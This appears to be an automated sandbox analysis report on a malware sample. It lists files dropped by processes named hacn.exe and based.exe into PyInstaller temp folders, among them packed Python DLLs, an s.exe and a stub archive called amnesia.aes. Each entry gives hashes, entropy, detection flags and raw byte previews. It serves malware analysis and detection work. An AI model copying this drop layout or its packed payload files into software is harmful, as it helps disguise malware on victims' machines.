Preview:	PK..........!..,..5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI75002\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3450648
Entropy (8bit):	6.098075450035195
Encrypted:	false
SSDEEP:	98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:	9D7A0C99256C50AFD5B0560BA2548930
SHA1:	76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:	9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:	CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.\|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...\|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\python310.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4458776
Entropy (8bit):	6.460390021076921
Encrypted:	false
SSDEEP:	49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
MD5:	63A1FA9259A35EAEAC04174CECB90048
SHA1:	0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
SHA-256:	14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
SHA-512:	896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.\|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10305678
Entropy (8bit):	7.995448000033802
Encrypted:	true
SSDEEP:	196608:lEXYfQ4Nqd/stHCeUAoG26oOVnPiV1yzjArvZHltA:lEXYYq+wjUsoOVnPiV1yGZPA
MD5:	F651062559F616AC562C15B565CBC13F
SHA1:	C68023A67C88C0A1CDD7C2244A39C4B6928CA338
SHA-256:	9FCFBAE706772F70BE1DAF4AE23AB366D9A479B8BACAA9AC1339D95A203119F2
SHA-512:	A73E37A3BAC664C1F957921E6A3C5323B018950F7D45ADD5591C221DB131EE79541CAB2AA80E03B2202BCAF9FDDD9F85C5A2EFF172ECC64F78F665F59A3AAFC0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29976
Entropy (8bit):	6.627859470728624
Encrypted:	false
SSDEEP:	768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:	A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:	1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:	DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:	5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75002\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1123608
Entropy (8bit):	5.3853088605790385
Encrypted:	false
SSDEEP:	12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
MD5:	81D62AD36CBDDB4E57A91018F3C0816E
SHA1:	FE4A4FC35DF240B50DB22B35824E4826059A807B
SHA-256:	1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
SHA-512:	7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)\|.K(.eJ)..K(.eJ).eK).eJ)\|.G(.eJ)\|.J(.eJ)\|..).eJ)\|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109440
Entropy (8bit):	6.642252418996898
Encrypted:	false
SSDEEP:	1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
MD5:	49C96CECDA5C6C660A107D378FDFC3D4
SHA1:	00149B7A66723E3F0310F139489FE172F818CA8E
SHA-256:	69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
SHA-512:	E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..\|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..\|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49432
Entropy (8bit):	7.814765644394208
Encrypted:	false
SSDEEP:	1536:qFvfmA9WmLbAsqCWrTZI+ufIsCViS7SyhxG:YfhAXplI+qIsCViSk
MD5:	C413931B63DEF8C71374D7826FBF3AB4
SHA1:	8B93087BE080734DB3399DC415CC5C875DE857E2
SHA-256:	17BFA656CABF7EF75741003497A1C315B10237805FF171D44625A04C16532293
SHA-512:	7DC45E7E5ED35CC182DE11A1B08C066918920A6879FF8E37B6BFBDD7D40BFFA39EA4ACA778AA8AFB99C81A365C51187DB046BCEB938CE9ACE0596F1CF746474F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B......B.i.C...B.i.....B.i.G...B.i.F...B.i.A...B..C...B..C...B...C..B..O...B..B...B......B..@...B.Rich..B.........................PE..d....k.d.........." ...$............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	123672
Entropy (8bit):	6.0603476725812415
Encrypted:	false
SSDEEP:	3072:T7u5LnIxdP3fPHW+gfLIhAxKpemWtIsLPKlY:Tw+3FgfLIhFemWeY
MD5:	6114277C6FC040F68D25CA90E25924CD
SHA1:	028179C77CB3BA29CD8494049421EAA4900CCD0E
SHA-256:	F07FE92CE85F7786F96A4D59C6EE5C05FE1DB63A1889BA40A67E37069639B656
SHA-512:	76E8EBEFB9BA4EA8DCAB8FCE50629946AF4F2B3F2F43163F75483CFB0A97968478C8AAEF1D6A37BE85BFC4C91A859DEDA6DA21D3E753DAEFE084A203D839353D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...M.".B......F......H......L......@...^..F......E......B......G...D.......^..B...^..E...^.N.E...^..E...RichD...........PE..d....k.d.........." ...$............p\..............................................[.....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	253720
Entropy (8bit):	6.554150968006557
Encrypted:	false
SSDEEP:	6144:3V9E1CyOa72oP+pG1/dgD09qWM53pLW1ADDtLRO75e:jEgyOa72jw1/d4VVhLE5e
MD5:	BE315973AFF9BDEB06629CD90E1A901F
SHA1:	151F98D278E1F1308F2BE1788C9F3B950AB88242
SHA-256:	0F9C6CC463611A9B2C692382FE1CDD7A52FEA4733FFAF645D433F716F8BBD725
SHA-512:	8EA715438472E9C174DEE5ECE3C7D9752C31159E2D5796E5229B1DF19F87316579352FC3649373DB066DC537ADF4869198B70B7D4D1D39AC647DA2DD7CFC21E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.`...`...`.......`..,....`..,....`..,....`..,....`.......`.......`...`...`.......`.......`.......`....r..`.......`..Rich.`..........................PE..d....k.d.........." ...$.x...<......\|...............................................>.....`.........................................0T..P....T...................'......./......P.......T...........................p...@............................................text...-w.......x.................. ..`.rdata..\|............\|..............@..@.data....*...p...$...T..............@....pdata...'.......(...x..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.661180108527419
Encrypted:	false
SSDEEP:	768:d35lZrQBD7Xiyfulct4ziTpojMIsOIHQ5YiSyvaAMxkEr4:p5YM8ulcKljMIsOIHC7SyAxn4
MD5:	B227BF5D9FEC25E2B36D416CCD943CA3
SHA1:	4FAE06F24A1B61E6594747EC934CBF06E7EC3773
SHA-256:	D42C3550E58B9AA34D58F709DC65DC4EE6EEA83B651740822E10B0AA051DF1D7
SHA-512:	C6D7C5A966C229C4C7042EF60015E3333DAB86F83C230C97B8B1042231FDB2A581285A5A08C33AD0864C6BD82F5A3298964AB317736AF8A43E7CAA7669298C3E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,'@.MI..MI..MI..5...MI.:3H..MI.:3L..MI.:3M..MI.:3J..MI..2H..MI..5H..MI.G0H..MI..MH..MI..2D..MI..2I..MI..2...MI..2K..MI.Rich.MI.........PE..d....l.d.........." ...$.P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.917624775312671
Encrypted:	false
SSDEEP:	1536:gQMcTNoOKoMWf9p5pYRCyO1yKprdsf2+iyfyiMIsZ1pc7SyExpg:9TiNo/VyMy3KpM2+id5IsZ1pcN
MD5:	542EAB18252D569C8ABEF7C58D303547
SHA1:	05EFF580466553F4687AE43ACBA8DB3757C08151
SHA-256:	D2A7111FEEAACAC8B3A71727482565C46141CC7A5A3D837D8349166BEA5054C9
SHA-512:	B7897B82F1AA9D5AA895C3DE810DAB1AA335FDF7223E4FF29B32340AD350D9BE6B145F95A71C7BC7C88C8DF77C3F04853AE4D6F0D5A289721FC1468ECBA3F958
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..'..lt..lt..lt...t..lt..mu..lt..iu..lt..hu..lt..ou..lt..mu..ltM.mu..lt..mt`.lt..au<.lt..lu..lt..t..lt..nu..ltRich..lt................PE..d....l.d.........." ...$. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.4855070174806375
Encrypted:	false
SSDEEP:	768:6+gXCwvc8pzLIsQUH25YiSyvYAMxkEl1C:KCwvcMLIsQUHM7SyexXC
MD5:	347D6A8C2D48003301032546C140C145
SHA1:	1A3EB60AD4F3DA882A3FD1E4248662F21BD34193
SHA-256:	E71803913B57C49F4CE3416EC15DC8A9E5C14F8675209624E76CD71B0319B192
SHA-512:	B1FDB46B80BB4A39513685781D563A7D55377E43E071901930A13C3E852D0042A5302CD238DDF6EA4D35CEEE5A613C96996BFFAD2DA3862673A0D27E60FF2C06
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7X.Y..Y..Y......Y.v.X..Y.v.\..Y.v.]..Y.v.Z..Y...X..Y...X..Y..X...Y...T..Y...Y..Y.....Y...[..Y.Rich.Y.........................PE..d....k.d.........." ...$.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	44312
Entropy (8bit):	7.711762406623848
Encrypted:	false
SSDEEP:	768:1deiwaiMMQ8HgVJbz3p8GQh4dsKwGn2Spk+XIsLwiFy5YiSyvZAMxkEa:lKFHEz3LwG2V+XIsLwiFw7SyJx+
MD5:	1A34253AA7C77F9534561DC66AC5CF49
SHA1:	FCD5E952F8038A16DA6C3092183188D997E32FB9
SHA-256:	DC03D32F681634E682B02E9A60FDFCE420DB9F26754AEFB9A58654A064DC0F9F
SHA-512:	FF9EEB4EDE4B4DD75C67FAB30D0DEC462B8AF9CA6ADC1DCAE58F0D169C55A98D85BB610B157F17077B8854EC15AF4DFAB2F0D47FA9BC463E5B2449979A50293A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.......e..N....e..N....e..N....e..N....e.......e...e..Re.......e.......e.......e....{..e.......e..Rich.e..................PE..d....l.d.........." ...$.p..........Pm....................................................`.............................................P.......h............ ..x...........X.......................................`y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57624
Entropy (8bit):	7.832439569480312
Encrypted:	false
SSDEEP:	1536:hUoHNtQh2qxFyEefg0/EwpXycIsOQSO7Syixiq:hUiNtQhDeft8iXtIsOQSOm
MD5:	1A8FDC36F7138EDCC84EE506C5EC9B92
SHA1:	E5E2DA357FE50A0927300E05C26A75267429DB28
SHA-256:	8E4B9DA9C95915E864C89856E2D7671CD888028578A623E761AEAC2FECA04882
SHA-512:	462A8F995AFC4CF0E041515F0F68600DFD0B0B1402BE7945D60E2157FFD4E476CF2AE9CDC8DF9595F0FE876994182E3E43773785F79B20C6DF08C8A8C47FFFA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..O..O..O.....O.p.N..O.p...O.p.J..O.p.K..O.p.L..O...N..O...N..O..N..O...B..O...O..O.....O...M..O.Rich.O.................PE..d....l.d.........." ...$.........`.......p...................................0............`..........................................+..P....)....... .......................+..$.......................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	66840
Entropy (8bit):	7.866060439121865
Encrypted:	false
SSDEEP:	1536:W4H4dOyk5Uv1PCxFE7zkSyo3bzej9wrwIsC75jk7Syu1xUa:jYdOK9PCQ7zkSyo3ej9wsIsC75w1a
MD5:	F9CC7385B4617DF1DDF030F594F37323
SHA1:	EBCEEC12E43BEE669F586919A928A1FD93E23A97
SHA-256:	B093AA2E84A30790ABEEE82CF32A7C2209978D862451F1E0B0786C4D22833CB6
SHA-512:	3F362C8A7542212D455F1F187E24F63C6190E564ADE0F24561E7E20375A1F15EB36BD8DCE9FDAAFDAB1D6B348A1C6F7CDDB9016E4F3535B49136550BC23454FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@.L.@.L.@.L.8$L.@.L.>.M.@.L.>.M.@.L.>.M.@.L.>.M.@.L.?.M.@.Lw=.M.@.L.@.L A.L.8.M.@.L.?.M.@.L.?.M.@.L.?HL.@.L.?.M.@.LRich.@.L........PE..d....l.d.........." ...$.........@.......P...................................0............`.........................................l,..d....)....... .......................,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\amnesia.aes

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	103430
Entropy (8bit):	7.565246620098563
Encrypted:	false
SSDEEP:	1536:U9MWOmjF8oo5TcRxTThJIQAXbMDmwnXTNfNzU/b4+fIFig0O3ApZPpTDlhLxS8hU:6S8HnmwD9XTPzUs+AFiBpE3WzU6m
MD5:	79C00026858AB474154AFAC35B67D1F4
SHA1:	5C6D5659FFC52F643FFE90597D93997E1C72C62C
SHA-256:	3E869021DE871B23150300033C398A2E0617D1A00352568AB9EEBA0650C44205
SHA-512:	F024D61EF224C8A0F311B37FAAE60CC564BE923D7457551FDBF387EFB4830E412A9CA5098054C81091EBDCD690E13A66DAE58B1EBD737D75E92D8DC0253846B3
Malicious:	false
Preview:	PK........h3.Y.A.............stub-o.pyc...........fJh........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1438582
Entropy (8bit):	5.590818209842686
Encrypted:	false
SSDEEP:	24576:mQR5pATuz/R5lUKdcubgAnyfbPer0iwhxdYf9Pqe9HH4:mQR5p1/RpL0
MD5:	5B5EDC46B4A4F69E88049D94A5FB26A1
SHA1:	C4B4813EDAFE8EEE13A12817103FC5550075E0EC
SHA-256:	114F8953BFB6F74630C6E17806F978A5B0EE8E1B26EFA5797C3FDE56EE9336D0
SHA-512:	3C444F59B196A95B034D6452A1F4541E969868B75780B777833704190E9C4653B90B2B80AE89AED74FB17FD8F3504901F09E00D1D0B8163299C4F0E28A8A4556
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1626904
Entropy (8bit):	7.952685381728523
Encrypted:	false
SSDEEP:	49152:1qs3Gg3Doju8k8lHFLRUYY1SVma7A5as1rM1CPwDvt3uFlDC:EsWg3uu6ldUYYoLA5e1CPwDvt3uFlDC
MD5:	78EBD9CB6709D939E4E0F2A6BBB80DA9
SHA1:	EA5D7307E781BC1FA0A2D098472E6EA639D87B73
SHA-256:	6A8C458E3D96F8DD3BF6D3CACC035E38EDF7F127EEE5563B51F8C8790CED0B3E
SHA-512:	B752769B3DE4B78905B0326B5270091642AC89FF204E9E4D78670791A1FA211A54D777AEEF59776C21F854C263ADD163ADAEF6A81B166190518CFAAF4E2E4122
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d......d.........." ...#.........P9..aO..`9...................................R...........`..........................................xO.....sO.h....pO.......K..............Q.....................................@mO.@...........................................UPX0.....P9.............................UPX1.........`9.....................@....rsrc........pO.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	229144
Entropy (8bit):	7.928946003227477
Encrypted:	false
SSDEEP:	6144:cIxkrRAZk7xPNsdt8qIn3ztlB28D3lKvEVGT6v:HuSaNS8r3xLJLQ0W6
MD5:	BF4A722AE2EAE985BACC9D2117D90A6F
SHA1:	3E29DE32176D695D49C6B227FFD19B54ABB521EF
SHA-256:	827FDB184FDCDE9223D09274BE780FE4FE8518C15C8FC217748AD5FD5EA0F147
SHA-512:	DD83B95967582152C7B5581121E6B69A07073E7A76FE87975742BB0FD7ECEF7494EC940DBA914364034CC4E3F623BE98CC887677B65C208F14A2A9FC7497CA73
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
